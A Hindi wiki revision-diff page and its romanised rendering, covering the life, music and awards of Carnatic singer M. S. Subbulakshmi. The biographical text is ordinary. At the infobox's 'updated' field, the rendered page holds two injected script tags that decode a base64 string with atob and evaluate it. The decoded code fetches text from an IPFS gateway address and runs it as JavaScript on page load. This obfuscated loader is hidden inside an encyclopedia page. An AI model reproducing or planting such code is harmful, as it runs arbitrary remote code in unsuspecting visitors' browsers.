Difference between revisions of "एम. एस. सुब्बुलक्ष्मी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(18 intermediate revisions by 5 users not shown)
Line 1: Line 1:
[[चित्र:Subbulakshami.jpg|thumb|एम. एस. सुब्बुलक्ष्मी|250px]]
+
{{सूचना बक्सा कलाकार
पूरा नाम '''मदुरै षण्मुखवडिवु सुब्बुलक्ष्मी''' (जन्म- [[16 सितंबर]], 1916 [[मद्रास]] मृत्यु- [[11 दिसंबर]], 2004 [[चेन्नई]]) को [[कर्नाटक]] [[संगीत]] का पर्याय माना जाता है और [[भारत]] की वह ऐसी पहली गायिका थीं जिन्हें सर्वोच्च नागरिक अलंकरण [[भारत रत्न]] से सम्मानित किया गया। उनके गाये हुए गाने, ख़ासकर भजन आज भी लोगों के बीच काफ़ी लोकप्रिय हैं। देश के प्रथम [[प्रधानमंत्री]] [[जवाहरलाल नेहरू]] ने उन्हें संगीत की रानी बताया तो वहीं स्वर साम्राज्ञी [[लता मंगेशकर]] ने उन्हें तपस्विनी कहा।
+
|चित्र=Subbulakshami.jpg
 +
|पूरा नाम=मदुरै षण्मुखवडिवु सुब्बुलक्ष्मी
 +
|अन्य नाम=एम. एस. सुब्बुलक्ष्मी
 +
|जन्म=[[16 सितंबर]], [[1916]]  
 +
|जन्म भूमि=[[मद्रास]]
 +
|अभिभावक=
 +
|पति/पत्नी=सदाशिवम
 +
|संतान=
 +
|कर्म भूमि=
 +
|कर्म-क्षेत्र=फ़िल्म [[संगीत]] (पार्श्वगायिका), भारतीय शास्त्रीय संगीत
 +
|मृत्यु=[[11 दिसंबर]], [[2004]]
 +
|मृत्यु स्थान=[[चेन्नई]]
 +
|मुख्य रचनाएँ=
 +
|मुख्य फ़िल्में= 
 +
|विषय=भारतीय शास्त्रीय संगीत, लोक संगीत, भजन, गज़ल
 +
|शिक्षा=
 +
|विद्यालय=
 +
|पुरस्कार-उपाधि='[[भारत रत्न]]', '[[पद्मविभूषण]]', '[[पद्म भूषण]]', '[[संगीत नाटक अकादमी|संगीत नाटक अकादमी सम्मान]]', '[[रेमन मेग्सेसे पुरस्कार|रैमन मैग्सेसे सम्मान]]'
 +
|प्रसिद्धि=
 +
|विशेष योगदान=
 +
|नागरिकता=भारतीय
 +
|संबंधित लेख=
 +
|शीर्षक 1=मुख्य गीत
 +
|पाठ 1= ‘वैष्णव जन तो तेणे कहिए, जो पीर पराई जाने रे’
 +
|शीर्षक 2=
 +
|पाठ 2=
 +
|अन्य जानकारी=सुब्बुलक्ष्मी ने [[कन्नड़ भाषा|कन्नड़]] के अलावा [[तमिल भाषा|तमिल]], [[मलयालम भाषा|मलयालम]], [[तेलुगू भाषा|तेलुगू]], [[हिंदी]], [[संस्कृत]], [[बंगाली भाषा|बंगाली]] और [[गुजराती भाषा|गुजराती]] में भी गीत गाए।
 +
|बाहरी कड़ियाँ=
 +
|अद्यतन={{अद्यतन|14:05, 22 मार्च 2012 (IST)}}
 +
}}
 +
'''मदुरै षण्मुखवडिवु सुब्बुलक्ष्मी''' अथवा एम. एस. सुब्बुलक्ष्मी (जन्म- [[16 सितंबर]], [[1916]] [[मद्रास]]; मृत्यु- [[11 दिसंबर]], [[2004]] [[चेन्नई]]) को '''[[कर्नाटक संगीत]]''' का पर्याय माना जाता है और [[भारत]] की वह ऐसी पहली गायिका थीं, जिन्हें सर्वोच्च नागरिक अलंकरण [[भारत रत्न]] से सम्मानित किया गया। उनके गाये हुए गाने, ख़ासकर भजन आज भी लोगों के बीच काफ़ी लोकप्रिय हैं। देश के प्रथम [[प्रधानमंत्री]] [[जवाहरलाल नेहरू]] ने उन्हें संगीत की रानी बताया तो वहीं स्वर साम्राज्ञी [[लता मंगेशकर]] ने उन्हें 'तपस्विनी' कहा।
 
==आरंभिक जीवन==
 
==आरंभिक जीवन==
====जन्म====
+
सुब्बुलक्ष्मी का जन्म मंदिरों के शहर मदुरै, मद्रास प्रेसीडेंसी, ब्रिटिश राज में 16 सितम्बर, 1916 को वीणा वादक षण्मुखवडिवु (लेखाधिकारी के यहाँ उनकी माता का नाम और जन्म स्थान ही अंकित है) के यहाँ हुआ। उनका बचपन का नाम 'कुंजाम्मा' था। उनकी नानी अक्काम्मल वायलिन वादक थीं। उनका प्रसिद्ध नाम एम.एस. था। बचपन में कुंजाम्मा अपने छोटे भाई और बहन के साथ संगीत के वातावरण में पले बढे। उनका घर मीनाक्षी मंदिर के पास ही था।<ref>{{cite web |url=http://sun.science.wayne.edu/~vhari/ms/|title=M.S. A Child Profile|accessmonthday=22 मार्च |accessyear=2012 |last= |first= |authorlink= |format= |publisher= |language=अंग्रेज़ी}}</ref>
एम. एस. सुब्बुलक्ष्मी देवदासी परिवार में उत्पन्न हुईं। सुब्बुलक्ष्मी का जन्म 1916 में हुआ था। 17 वर्ष की आयु में उन्होंने चेन्नई संगीत अकादमी में एक श्रेष्ठ गायिका के रूप में अपना नाम दर्ज करा लिया था। प्रारम्भ से ही उनके मन में अपने संगीत के सम्बन्ध में यह भावना थी कि, उनके संगीत को सुनकर मुरझाए हुए चेहरों पर परमानन्द की झलक दिखाई दे।<ref name="चरित कोश">{{cite book | last =लीलाधर | first =शर्मा  | title =भारतीय चरित कोश  | edition = | publisher =शिक्षा भारती | location =भारतडिस्कवरी पुस्तकालय  | language =[[हिन्दी]]  | pages =932  | chapter = }}</ref>   
+
 +
एम. एस. सुब्बुलक्ष्मी देवदासी परिवार में उत्पन्न हुईं। 17 वर्ष की आयु में उन्होंने 'चेन्नई संगीत अकादमी' में एक श्रेष्ठ गायिका के रूप में अपना नाम दर्ज करा लिया था। प्रारम्भ से ही उनके मन में अपने संगीत के सम्बन्ध में यह भावना थी कि, उनके संगीत को सुनकर मुरझाए हुए चेहरों पर परमानन्द की झलक दिखाई दे।<ref name="चरित कोश">{{cite book | last =लीलाधर | first =शर्मा  | title =भारतीय चरित कोश  | edition = | publisher =शिक्षा भारती | location =भारतडिस्कवरी पुस्तकालय  | language =[[हिन्दी]]  | pages =932  | chapter = }}</ref>   
 
====पहला एलबम====
 
====पहला एलबम====
सुब्बुलक्ष्मी बचपन में ही कर्नाटक संगीत से जुड़ गयी थीं और उनका पहला एलबम महज दस साल की उम्र में निकला था। प्रसिद्ध संगीताचार्य सेम्मनगुडी श्रीनिवास अय्यर से संगीत की शिक्षा ग्रहण करने के बाद उन्होंने पंडित नारायण राव से शास्त्रीय संगीत की शिक्षा ली। सुब्बुलक्ष्मी ने पहली बार सार्वजनिक तौर पर अपने गायन का प्रदर्शन एक समारोह के दौरान किया। इसके बाद वह आगे की पढ़ाई के लिए मद्रास संगीत अकादमी चली गयी, जहाँ सिर्फ 17 साल की उम्र में भव्य कार्यक्रम आयोजित किये। उन्होंने [[कन्नड़ भाषा|कन्नड़]] के अलावा [[तमिल भाषा|तमिल]], [[मलयालम भाषा|मलयालम]], [[तेलुगू भाषा|तेलुगू]], [[हिंदी]], [[संस्कृत]], [[बंगाली भाषा|बंगाली]] और [[गुजराती भाषा|गुजराती]] में भी गीत गाए। उन्होंने 1945 में 'भक्त मीरा' नामक फिल्म में बेहतरीन भूमिका अदा की। उन्होंने मीरा भजन को अपने सुरों में पिरोया, जो आज तक लोगों द्वारा सुने जाते हैं।<ref name="LH">{{cite web |url=http://www.livehindustan.com/news/google/meribaat/article1-story-216-216-85789.html |title=जादुई खनक थी सुब्बुलक्ष्मी की आवाज में |accessmonthday=16 अगस्त |accessyear=2011 |last= |first= |authorlink= |format=एच.टी.एम.एल |publisher=लाइव हिन्दुस्तान डॉट कॉम |language=हिन्दी }}</ref>
+
सुब्बुलक्ष्मी बचपन में ही [[कर्नाटक संगीत]] से जुड़ गयी थीं और उनका पहला एलबम महज दस साल की उम्र में निकला था। प्रसिद्ध संगीताचार्य 'सेम्मनगुडी श्रीनिवास अय्यर' से संगीत की शिक्षा ग्रहण करने के बाद उन्होंने 'पंडित नारायण राव' से [[भारतीय शास्त्रीय संगीत|शास्त्रीय संगीत]] की शिक्षा ली। सुब्बुलक्ष्मी ने पहली बार सार्वजनिक तौर पर अपने गायन का प्रदर्शन एक समारोह के दौरान किया। इसके बाद वह आगे की पढ़ाई के लिए 'मद्रास संगीत अकादमी' चली गयी, जहाँ सिर्फ 17 साल की उम्र में भव्य कार्यक्रम आयोजित किये। उन्होंने [[कन्नड़ भाषा|कन्नड़]] के अलावा [[तमिल भाषा|तमिल]], [[मलयालम भाषा|मलयालम]], [[तेलुगू भाषा|तेलुगू]], [[हिंदी]], [[संस्कृत]], [[बंगाली भाषा|बंगाली]] और [[गुजराती भाषा|गुजराती]] में भी गीत गाए। उन्होंने [[1945]] में 'भक्त मीरा' नामक फ़िल्म में बेहतरीन भूमिका अदा की। उन्होंने मीरा के भजन को अपने सुरों में पिरोया, जो आज तक लोगों द्वारा सुने जाते हैं।<ref name="LH">{{cite web |url=http://www.livehindustan.com/news/google/meribaat/article1-story-216-216-85789.html |title=जादुई खनक थी सुब्बुलक्ष्मी की आवाज़ में |accessmonthday=16 अगस्त |accessyear=2011 |last= |first= |authorlink= |format=एच.टी.एम.एल |publisher=लाइव हिन्दुस्तान डॉट कॉम |language=हिन्दी }}</ref>
 
====विवाह====
 
====विवाह====
सन 1936 में वह स्वतंत्रता सेनानी सदाशिवम से मिलीं और 1940 में उनकी जीवन संगिनी बन गयीं। सदाशिवम के अपनी पहली पत्नी से चार बच्चों थे जिन्हें सुब्बुलक्ष्मी ने अपनी संतान की तरह पाला।<ref name="LH"/>
+
सन [[1936]] में वह 'स्वतंत्रता सेनानी सदाशिवम' से मिलीं और [[1940]] में उनकी जीवन संगिनी बन गयीं। सदाशिवम के अपनी पहली पत्नी से चार बच्चे थे जिन्हें सुब्बुलक्ष्मी ने अपनी संतान की तरह पाला।<ref name="LH"/>
 
==लोकप्रियता==
 
==लोकप्रियता==
सुब्बुलक्ष्मी की लोकप्रियता उनके गायन के कारण तो है ही, परन्तु उन्होंने जो भक्ति संगीत भारत और सम्पूर्ण विश्व को दिया है, उसके कारण विशेष रूप से उन्हें स्मरण किया जाता है। जब वह [[गांधी जी]] के प्रिय भजन ‘वैष्णव जन तो तेणे कहिए, जो पीर पराई जाने रे’ गातीं, तो एक विशेष प्रकार का जादू-सा श्रोताओं पर छा जाता है। उन्होंने [[मीरा]] के अनेक भजन भी गाए हैं। उन्होंने मीरा नामक तमिल फ़िल्म में भी काम किया। जब इस फ़िल्म का हिन्दी रूपान्तर पेश किया गया, तो सुब्बुलक्ष्मी को हिन्दी जगत में विशेष रूप जाना जाने लगा। वे इसके कारण सम्पूर्ण देश में प्रसिद्ध हो गईं। सुब्बुलक्ष्मी ने जब संयुक्त राष्ट्र की असेम्बली में अपना गायन पेश किया था, तो प्रसिद्ध पत्र ‘न्यूयार्क टाइम्स’ ने लिखा था कि, वे अपने संगीत के द्वारा पश्चिम के श्रोताओं से जो सम्पर्क स्थापित करती हैं, उसके लिए यह आवश्यक नहीं कि श्रोता उनके शब्दों का अर्थ समझें। इसके लिए उनके कंठ से निकला हुआ मधुर स्वर पश्चिमी श्रोताओं के लिए सबसे सरल और महत्त्वपूर्ण माध्यम है।<ref name="चरित कोश"/>
+
सुब्बुलक्ष्मी की लोकप्रियता उनके गायन के कारण तो है ही, परन्तु उन्होंने जो भक्ति संगीत [[भारत]] और सम्पूर्ण विश्व को दिया है, उसके कारण विशेष रूप से उन्हें स्मरण किया जाता है। जब वह [[गांधी जी]] के प्रिय भजन ‘वैष्णव जन तो तेणे कहिए, जो पीर पराई जाने रे’ गातीं, तो एक विशेष प्रकार का जादू-सा श्रोताओं पर छा जाता है। उन्होंने [[मीरा]] के अनेक भजन भी गाए हैं। उन्होंने मीरा नामक तमिल फ़िल्म में भी काम किया। जब इस फ़िल्म का हिन्दी रूपान्तर पेश किया गया, तो सुब्बुलक्ष्मी को हिन्दी जगत् में विशेष रूप जाना जाने लगा। वे इसके कारण सम्पूर्ण देश में प्रसिद्ध हो गईं। सुब्बुलक्ष्मी ने जब संयुक्त राष्ट्र की असेम्बली में अपना गायन पेश किया था, तो प्रसिद्ध पत्र ‘न्यूयार्क टाइम्स’ ने लिखा था कि, वे अपने संगीत के द्वारा पश्चिम के श्रोताओं से जो सम्पर्क स्थापित करती हैं, उसके लिए यह आवश्यक नहीं कि श्रोता उनके शब्दों का अर्थ समझें। इसके लिए उनके कंठ से निकला हुआ मधुर स्वर पश्चिमी श्रोताओं के लिए सबसे सरल और महत्त्वपूर्ण माध्यम है।<ref name="चरित कोश"/>
*सुब्बुलक्ष्मी के बारे में कहा जाता है कि जो लोग उनकी भाषा नहीं समक्षते थे, वे भी उनकी गायकी सुनते थे। उनकी आवाज को परमात्मा की अभिव्यक्ति कहा जाता था और लोग प्रसन्नचित होकर उनका गायन सुनते थे। उनके प्रशंसकों की फेहरिस्त में [[महात्मा गांधी]] और [[जवाहरलाल नेहरू]] सरीखे कई प्रख्यात लोग थे। उनके बारे में गांधी जी का कहना था, वह किसी और का गायन सुनने की बजाय सुब्बुलक्ष्मी की आवाज सुनना पसंद करेंगे।<ref name="LH"/>
+
*सुब्बुलक्ष्मी के बारे में कहा जाता है कि जो लोग उनकी भाषा नहीं समझते थे, वे भी उनकी गायकी सुनते थे। उनकी आवाज़ को परमात्मा की अभिव्यक्ति कहा जाता था और लोग प्रसन्नचित होकर उनका गायन सुनते थे। उनके प्रशंसकों की फेहरिस्त में [[महात्मा गांधी]] और [[जवाहरलाल नेहरू]] सरीखे कई प्रख्यात लोग थे। उनके बारे में गांधी जी का कहना था, वह किसी और का गायन सुनने की बजाय सुब्बुलक्ष्मी की आवाज़ सुनना पसंद करेंगे।<ref name="LH"/>
 
==पति का मार्गदर्शन==
 
==पति का मार्गदर्शन==
 
[[चित्र:Ms subbalakshmi.jpg|thumb|एम. एस. सुब्बुलक्ष्मी|250px]]
 
[[चित्र:Ms subbalakshmi.jpg|thumb|एम. एस. सुब्बुलक्ष्मी|250px]]
सुब्बुलक्ष्मी का मार्गदर्शन करने और विश्व की एक सर्वोत्तम गायिका बनाने में उनके पति का मार्गदर्शन रहा है। उन्होंने स्वयं इस बात को स्वीकार किया है कि यदि मुझे अपने पति से मार्गदर्शन और सहायता नहीं मिली होती, तो मैं इस मुकाम तक नहीं पहुँच पाती। बीसवीं शताब्दी की महान भक्ति गायिका होने के बावजूद वे सदैव नम्र बनी रहीं और संगीत में अपनी ख्याति के लिए अपने पति सदाशिवम् का आभार मानती रहीं। सदाशिवम् की विशेषता यह थी कि, गांधीवादी और स्वतंत्रता सेनानी होने के बावजूद जब से उन्होंने सुब्बुलक्ष्मी का हाथ थामा, ऐसा कोई प्रयत्न शेष नहीं छोड़ा, जिससे सुब्बुलक्ष्मी की ख्याति दिनों-दिन बढ़ती न रहे। उन्होंने सुब्बुलक्ष्मी की गायन सभाओं का इस प्रकार आयोजन किया कि, वे सफलताओं की सीढ़ियाँ चढ़ती ही गईं। इन्हीं के प्रयत्नों के कारण सुब्बुलक्ष्मी को ‘नायटिंगेल ऑफ़ इंडिया’ कहा गया, जबकि इससे पहले यह खिताब केवल [[सरोजिनी नायडू]] को ही प्राप्त था। रामधुन और भक्ति संगीत को गाने की प्रेरणा भी उन्हें सदाशिवम् से ही मिली थी।<ref name="चरित कोश"/>
+
सुब्बुलक्ष्मी को विश्व की एक सर्वोत्तम गायिका बनाने में उनके पति का मार्गदर्शन रहा है। उन्होंने स्वयं इस बात को स्वीकार किया है कि यदि मुझे अपने पति से मार्गदर्शन और सहायता नहीं मिली होती, तो मैं इस मुकाम तक नहीं पहुँच पाती। बीसवीं शताब्दी की महान् भक्ति गायिका होने के बावजूद वे सदैव नम्र बनी रहीं और संगीत में अपनी ख्याति के लिए अपने पति सदाशिवम का आभार मानती रहीं। सदाशिवम की विशेषता यह थी कि, गांधीवादी और स्वतंत्रता सेनानी होने के बावजूद जब से उन्होंने सुब्बुलक्ष्मी का हाथ थामा, ऐसा कोई प्रयत्न शेष नहीं छोड़ा, जिससे सुब्बुलक्ष्मी की ख्याति दिनों-दिन बढ़ती न रहे। उन्होंने सुब्बुलक्ष्मी की गायन सभाओं का इस प्रकार आयोजन किया कि, वे सफलताओं की सीढ़ियाँ चढ़ती ही गईं। इन्हीं के प्रयत्नों के कारण सुब्बुलक्ष्मी को ‘नाइटेंगेल ऑफ़ इंडिया’ कहा गया, जबकि इससे पहले यह खिताब केवल [[सरोजिनी नायडू]] को ही प्राप्त था। रामधुन और भक्ति संगीत को गाने की प्रेरणा भी उन्हें सदाशिवम् से ही मिली थी।<ref name="चरित कोश"/>
 +
==प्रशंसा के नाम==
 +
अनेक मशहूर संगीतकारों ने श्रीमती सुब्बुलक्ष्मी की कला की तारीफ़ की है। -
 +
*[[लता मंगेशकर]] ने आपको 'तपस्विनी' कहा,
 +
*[[बड़े ग़ुलाम अली ख़ाँ|उस्ताद बड़े ग़ुलाम अली ख़ां]] ने आपको 'सुस्वरलक्ष्मी' पुकारा,
 +
*[[किशोरी अमोनकर]] ने आपको 'आठ्वां सुर' कहा, जो संगीत के सात सुरों से ऊंचा है।
 +
*एमएस लावण्या एवं एमएस सुबुलक्ष्मी को लोग 'सेक्‍सोफोन सिस्‍टर' के नाम से ज्यादा जानते हैं
 +
*भारत के कई माननीय नेता, जैसे महात्मा गांधी और पंडित नेहरु भी आपके संगीत के प्रशंसक थे। एक अवसर पर महात्मा गांधी ने कहा कि अगर श्रीमती सुब्बुलक्ष्मी 'हरि, तुम हरो जन की भीर' इस मीरा भजन को गाने के बजाय बोल भी दें, तब भी उनको वह भजन किसी और के गाने से अधिक सुरीला लगेगा।
 +
==प्रथम भारतीय==
 +
श्रीमती सुब्बुलक्ष्मी पहली भारतीय हैं जिन्होंने संयुक्त राष्ट्र संघ (United Nations) की सभा में संगीत कार्यक्रम प्रस्तुत किया, तथा आप पहली स्त्री हैं जिनको कर्णाटक संगीत का सर्वोत्तम पुरस्कार, संगीत कलानिधि प्राप्त हुआ।
 
==सम्मान और पुरस्कार==
 
==सम्मान और पुरस्कार==
 +
[[चित्र:MS-Subbulakshmi-stamp.jpg|thumb|सुब्बुलक्ष्मी के सम्मान में जारी [[डाक टिकट]]]]
 
भारत के सर्वोच्च नागरिक सम्मान ‘[[भारत रत्न]]’ से सम्मानित किए जाने के अतिरिक्त उन्हें मद्रास संगीत अकादमी ने संगीत कलानिधि की उपाधि से अंलकृत किया था। यह सम्मान प्राप्त करने वाली वह प्रथम महिला थीं। 1974 में उन्हें [[रेमन मेग्सेसे पुरस्कार|‘रेमन मेगसेसे’ पुरस्कार]] प्राप्त हुआ और 1990 में राष्ट्रीय एकता के लिए उन्हें इंदिरा गांधी अवार्ड दिया गया।<ref name="चरित कोश"/>
 
भारत के सर्वोच्च नागरिक सम्मान ‘[[भारत रत्न]]’ से सम्मानित किए जाने के अतिरिक्त उन्हें मद्रास संगीत अकादमी ने संगीत कलानिधि की उपाधि से अंलकृत किया था। यह सम्मान प्राप्त करने वाली वह प्रथम महिला थीं। 1974 में उन्हें [[रेमन मेग्सेसे पुरस्कार|‘रेमन मेगसेसे’ पुरस्कार]] प्राप्त हुआ और 1990 में राष्ट्रीय एकता के लिए उन्हें इंदिरा गांधी अवार्ड दिया गया।<ref name="चरित कोश"/>
 
* [[1954]] में [[पद्म भूषण]]  
 
* [[1954]] में [[पद्म भूषण]]  
 
* [[1956]] में [[संगीत नाटक अकादमी|संगीत नाटक अकादमी सम्मान]]
 
* [[1956]] में [[संगीत नाटक अकादमी|संगीत नाटक अकादमी सम्मान]]
* [[1974]] में [[रेमन मेग्सेसे पुरस्कार|रैमन मैग्सेसे सम्मान]]
+
* [[1974]] में [[रेमन मेग्सेसे पुरस्कार|रैमन मैग्सेसे सम्मान]]
 
* [[1975]] में [[पद्म विभूषण]]
 
* [[1975]] में [[पद्म विभूषण]]
 
* [[1988]] में कैलाश सम्मान
 
* [[1988]] में कैलाश सम्मान
Line 24: Line 65:
  
 
==निधन==
 
==निधन==
88 साल की उम्र में महान गायिका एम.एस. सुब्बुलक्ष्मी [[11 दिसंबर]], 2004 को दुनिया को अलविदा कह गयीं।  
+
88 साल की उम्र में महान् गायिका एम.एस. सुब्बुलक्ष्मी [[11 दिसंबर]], [[2004]] को दुनिया को अलविदा कह गयीं।  
 +
 
 +
==चित्र वीथिका==
 +
<gallery>
 +
चित्र:Subbulaxmi-1.jpg|एम. एस. सुब्बुलक्ष्मी
 +
चित्र:Subbulaxmi-2.jpg|सुब्बुलक्ष्मी अपने पति (सदाशिवम) के साथ
 +
चित्र:Subbulaxmi-3.jpg|सुब्बुलक्ष्मी, [[इन्दिरा गाँधी]] के साथ
 +
चित्र:Subbulaxmi-4.jpg|सुब्बुलक्ष्मी, [[कर्ण सिंह]] के साथ 
 +
चित्र:Subbulaxmi-5.jpg|सुब्बुलक्ष्मी की प्रतिमा
 +
चित्र:Subbulaxmi-6.jpg|एम. एस. सुब्बुलक्ष्मी
 +
चित्र:Subbulaxmi-7.jpg|एम. एस. सुब्बुलक्ष्मी
 +
चित्र:Subbulaxmi-8.jpg|एम. एस. सुब्बुलक्ष्मी
 +
चित्र:Subbulaxmi-9.jpg|एम. एस. सुब्बुलक्ष्मी
 +
चित्र:Subbulaxmi-10.jpg|सुब्बुलक्ष्मी, [[सरोजिनी नायडू]] के साथ
 +
चित्र:Subbulaxmi-11.jpg|एम. एस. सुब्बुलक्ष्मी
 +
चित्र:Subbulaxmi-12.jpg|शादी के अवसर पर सुब्बुलक्ष्मी अपने पति के साथ
 +
चित्र:Subbulaxmi-14.jpg|एम. एस. सुब्बुलक्ष्मी
 +
चित्र:Subbulaxmi-13.jpg|सुब्बुलक्ष्मी, [[गाँधी जी]] के साथ
 +
</gallery>
  
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
 
==बाहरी कड़ियाँ==
 
==बाहरी कड़ियाँ==
 +
*[http://sun.science.wayne.edu/~vhari/ms/ Smt M.S. Subbulakshmi ]
 
*[http://www.in.com/music/artist/m-s-subbulakshmi-6871-1.html सुब्बुलक्ष्मी के गीत और भजन]
 
*[http://www.in.com/music/artist/m-s-subbulakshmi-6871-1.html सुब्बुलक्ष्मी के गीत और भजन]
 
*[http://mahenmehta.blogspot.com/2009/03/blog-post_19.html सुस्वरलक्ष्मी का आठवां सुर]
 
*[http://mahenmehta.blogspot.com/2009/03/blog-post_19.html सुस्वरलक्ष्मी का आठवां सुर]
Line 36: Line 96:
 
*[http://www.msstribute.org/ A tribute to M.S.Subbulakshmi (अंग्रेज़ी)]
 
*[http://www.msstribute.org/ A tribute to M.S.Subbulakshmi (अंग्रेज़ी)]
 
*[http://sun.science.wayne.edu/~vhari/ms/ Smt M.S. Home Page (अंग्रेज़ी)]
 
*[http://sun.science.wayne.edu/~vhari/ms/ Smt M.S. Home Page (अंग्रेज़ी)]
 
+
*[http://rmaward.asia/awardees/subbulakshmi-m-s/ Subbulakshmi, M. S.]
 
==संबंधित लेख==
 
==संबंधित लेख==
{{भारत रत्‍न}}{{भारत रत्‍न2}}
+
{{शास्त्रीय गायक कलाकार}}{{भारत रत्‍न}}{{रेमन मैग्सेसे पुरस्कार}}{{भारत रत्‍न2}}
{{रेमन मैग्सेसे पुरस्कार}}
+
[[Category:गायिका]][[Category:पद्म विभूषण]][[Category:पद्म भूषण]][[Category:भारत रत्न सम्मान]][[Category:प्रसिद्ध व्यक्तित्व]][[Category:संगीत कोश]][[Category:प्रसिद्ध व्यक्तित्व कोश]][[Category:चरित कोश]][[Category:शास्त्रीय गायक कलाकार]][[Category:रेमन मैग्सेसे पुरस्कार]][[Category:इंदिरा गाँधी राष्ट्रीय एकता पुरस्कार]]
[[Category:गायिका]]
 
[[Category:पद्म विभूषण]]
 
[[Category:पद्म भूषण]]
 
[[Category:भारत रत्न सम्मान]]
 
[[Category:प्रसिद्ध व्यक्तित्व]]
 
[[Category:संगीत कोश]]
 
[[Category:प्रसिद्ध व्यक्तित्व कोश]][[Category:चरित कोश]]
 
[[Category:शास्त्रीय गायक कलाकार]]
 
[[Category:रेमन मैग्सेसे पुरस्कार]]
 
 
__NOTOC__
 
__NOTOC__

Latest revision as of 05:31, 16 September 2017

em. es. subbulakshmi
poora nam madurai shanmukhavadivu subbulakshmi
any nam em. es. subbulakshmi
janm 16 sitanbar, 1916
janm bhoomi madras
mrityu 11 disanbar, 2004
mrityu sthan chennee
pati/patni sadashivam
karm-kshetr film sangit (parshvagayika), bharatiy shastriy sangit
vishay bharatiy shastriy sangit, lok sangit, bhajan, gazal
puraskar-upadhi 'bharat ratn', 'padmavibhooshan', 'padm bhooshan', 'sangit natak akadami samman', 'raiman maigsese samman'
nagarikata bharatiy
mukhy git ‘vaishnav jan to tene kahie, jo pir paraee jane re’
any janakari subbulakshmi ne kann d ke alava tamil, malayalam, telugoo, hiandi, sanskrit, bangali aur gujarati mean bhi git gae.
adyatan‎ <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

madurai shanmukhavadivu subbulakshmi athava em. es. subbulakshmi (janm- 16 sitanbar, 1916 madras; mrityu- 11 disanbar, 2004 chennee) ko karnatak sangit ka paryay mana jata hai aur bharat ki vah aisi pahali gayika thian, jinhean sarvochch nagarik alankaran bharat ratn se sammanit kiya gaya. unake gaye hue gane, khasakar bhajan aj bhi logoan ke bich kafi lokapriy haian. desh ke pratham pradhanamantri javaharalal neharoo ne unhean sangit ki rani bataya to vahian svar samrajni lata mangeshakar ne unhean 'tapasvini' kaha.

aranbhik jivan

subbulakshmi ka janm mandiroan ke shahar madurai, madras presideansi, british raj mean 16 sitambar, 1916 ko vina vadak shanmukhavadivu (lekhadhikari ke yahaan unaki mata ka nam aur janm sthan hi aankit hai) ke yahaan hua. unaka bachapan ka nam 'kuanjamma' tha. unaki nani akkammal vayalin vadak thian. unaka prasiddh nam em.es. tha. bachapan mean kuanjamma apane chhote bhaee aur bahan ke sath sangit ke vatavaran mean pale badhe. unaka ghar minakshi mandir ke pas hi tha.[1]

em. es. subbulakshmi devadasi parivar mean utpann hueean. 17 varsh ki ayu mean unhoanne 'chennee sangit akadami' mean ek shreshth gayika ke roop mean apana nam darj kara liya tha. prarambh se hi unake man mean apane sangit ke sambandh mean yah bhavana thi ki, unake sangit ko sunakar murajhae hue cheharoan par paramanand ki jhalak dikhaee de.[2]

pahala elabam

subbulakshmi bachapan mean hi karnatak sangit se ju d gayi thian aur unaka pahala elabam mahaj das sal ki umr mean nikala tha. prasiddh sangitachary 'semmanagudi shrinivas ayyar' se sangit ki shiksha grahan karane ke bad unhoanne 'pandit narayan rav' se shastriy sangit ki shiksha li. subbulakshmi ne pahali bar sarvajanik taur par apane gayan ka pradarshan ek samaroh ke dauran kiya. isake bad vah age ki padhaee ke lie 'madras sangit akadami' chali gayi, jahaan sirph 17 sal ki umr mean bhavy karyakram ayojit kiye. unhoanne kann d ke alava tamil, malayalam, telugoo, hiandi, sanskrit, bangali aur gujarati mean bhi git gae. unhoanne 1945 mean 'bhakt mira' namak film mean behatarin bhoomika ada ki. unhoanne mira ke bhajan ko apane suroan mean piroya, jo aj tak logoan dvara sune jate haian.[3]

vivah

san 1936 mean vah 'svatantrata senani sadashivam' se milian aur 1940 mean unaki jivan sangini ban gayian. sadashivam ke apani pahali patni se char bachche the jinhean subbulakshmi ne apani santan ki tarah pala.[3]

lokapriyata

subbulakshmi ki lokapriyata unake gayan ke karan to hai hi, parantu unhoanne jo bhakti sangit bharat aur sampoorn vishv ko diya hai, usake karan vishesh roop se unhean smaran kiya jata hai. jab vah gaandhi ji ke priy bhajan ‘vaishnav jan to tene kahie, jo pir paraee jane re’ gatian, to ek vishesh prakar ka jadoo-sa shrotaoan par chha jata hai. unhoanne mira ke anek bhajan bhi gae haian. unhoanne mira namak tamil film mean bhi kam kiya. jab is film ka hindi roopantar pesh kiya gaya, to subbulakshmi ko hindi jagath mean vishesh roop jana jane laga. ve isake karan sampoorn desh mean prasiddh ho geean. subbulakshmi ne jab sanyukt rashtr ki asembali mean apana gayan pesh kiya tha, to prasiddh patr ‘nyooyark taims’ ne likha tha ki, ve apane sangit ke dvara pashchim ke shrotaoan se jo sampark sthapit karati haian, usake lie yah avashyak nahian ki shrota unake shabdoan ka arth samajhean. isake lie unake kanth se nikala hua madhur svar pashchimi shrotaoan ke lie sabase saral aur mahattvapoorn madhyam hai.[2]

  • subbulakshmi ke bare mean kaha jata hai ki jo log unaki bhasha nahian samajhate the, ve bhi unaki gayaki sunate the. unaki avaz ko paramatma ki abhivyakti kaha jata tha aur log prasannachit hokar unaka gayan sunate the. unake prashansakoan ki pheharist mean mahatma gaandhi aur javaharalal neharoo sarikhe kee prakhyat log the. unake bare mean gaandhi ji ka kahana tha, vah kisi aur ka gayan sunane ki bajay subbulakshmi ki avaz sunana pasand kareange.[3]

pati ka margadarshan

